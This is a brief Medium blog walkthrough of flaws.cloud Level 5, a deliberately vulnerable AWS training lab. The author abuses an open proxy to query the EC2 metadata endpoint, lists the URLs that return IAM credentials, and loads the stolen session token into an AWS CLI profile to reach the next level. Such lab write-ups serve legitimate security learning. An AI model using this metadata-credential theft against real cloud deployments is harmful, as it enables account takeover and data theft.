flaws.cloud walkthrough | AWS penetration testing — Level-5

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/

http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

So, Well, I tried to access the /proxy/169.254.169.254/ to get the meta data, I was able to browse to a lot of hidden folders and sub folders.

One of them looked to juicy.

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

Also, One more URL,

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

Now after the configure profile command from the aws-shell

Command: aws configure — profile level3

Now, from the .aws folder in the user/(youruser)/.aws directory edit the credentials file and add the aws_sesssion_token = the token you just got above.

Now let’s try to see the s3 buckets.

Now, just copy the directory ddcc78ff/ and append it after the level 6 URL.

Bingo We’re at level 6

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store